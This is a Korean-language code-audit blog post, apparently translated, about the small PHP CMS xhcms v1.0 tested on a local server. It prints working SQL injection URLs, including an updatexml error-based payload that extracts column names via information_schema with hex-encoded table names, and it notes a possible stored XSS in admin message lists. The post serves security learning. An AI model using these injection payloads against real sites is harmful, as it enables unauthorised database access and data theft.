[코드 감사] xhcmsv1.0
6804 단어 코드 감사
http://www.darkerbox.com
여러분 의 학습 교 류 를 환영 합 니 다.
환경:
cms :http://down.chinaz.com/soft/39154.htm
phpstudy
php 5.5.45
mysql 5.5.53
코드 감 사 를 배우 고 싶 습 니 다.좀 작은 걸 로 보 여 주세요.
sql 주입
설치 절 차 는 말 하지 않 고 설치 한 후 다음 과 같다.



이 cid 는 매우 뚜렷 하 다.sql 주입 이 있 는 지 테스트 합 니 다.
http://127.0.0.1:7000/?r=content&cid=5' and 1=1;#




http://127.0.0.1:7000/?r=content&cid=5 and updatexml(1,concat(0x3a,substring((select group_concat(column_name) from information_schema.columns where table_name=0x6C696E6B),1)),1)

작은 따옴표 가 걸 러 졌 기 때문에 표 이름 은 16 진법 으로 표시 합 니 다.그 다음 절 차 는 자세히 말 하지 않 겠 습 니 다.
XSS
이것 도 구멍 인지 아 닌 지 모 르 겠 어 요.나 는 admin 으로 백 스테이지 에 들 어간 후.다른 사람 이 나 에 게 준 메 시 지 를 볼 수 있다.여기 xss 가 있 을 수 있 습 니 다.추적 코드 찾기
commentlists.php
.
우리 가 제출 한 인 자 는 message 입 니 다.메모 입 니 다.

184 줄 에서 sql 문 구 를 찾 습 니 다.


가입자 가 등 록 된 곳 과 댓 글 이 달 린 곳 을 찾 지 못 해 있 는 지 없 는 지 모르겠다.있 을 것 같 아서 요.그래서 제 가 데이터베이스 에 직접 문 구 를 삽입 하 겠 습 니 다.



hhh
이기 때문에 클릭 해 야 xs 를 촉발 할 수 있 습 니 다.다른 구멍 이 있 을 수 있 습 니 다. 발견 되면 이 글 을 계속 업데이트 할 것 입 니 다.
모두 가 함께 학습 하고 교류 하 며 함께 발전 하 는 것 을 환영 합 니 다. 정보 안전 소 백 군 에 가입 하 는 것 을 환영 합 니 다.

이 내용에 흥미가 있습니까?
현재 기사가 여러분의 문제를 해결하지 못하는 경우 AI 엔진은 머신러닝 분석(스마트 모델이 방금 만들어져 부정확한 경우가 있을 수 있음)을 통해 가장 유사한 기사를 추천합니다:
[코드 감사] xhcmsv1.0php 에서 수신 r 인 자 를 볼 수 있 습 니 다.그리고 파일 을 포함 합 니 다.(여기에 파일 이 포 함 될 수 있 습 니 다. 이것 도 구멍 인지 아 닌 지 모 르 겠 어 요.나 는 admin 으로 백 스테이...
텍스트를 자유롭게 공유하거나 복사할 수 있습니다.하지만 이 문서의 URL은 참조 URL로 남겨 두십시오.
CC BY-SA 2.5, CC BY-SA 3.0 및 CC BY-SA 4.0에 따라 라이센스가 부여됩니다.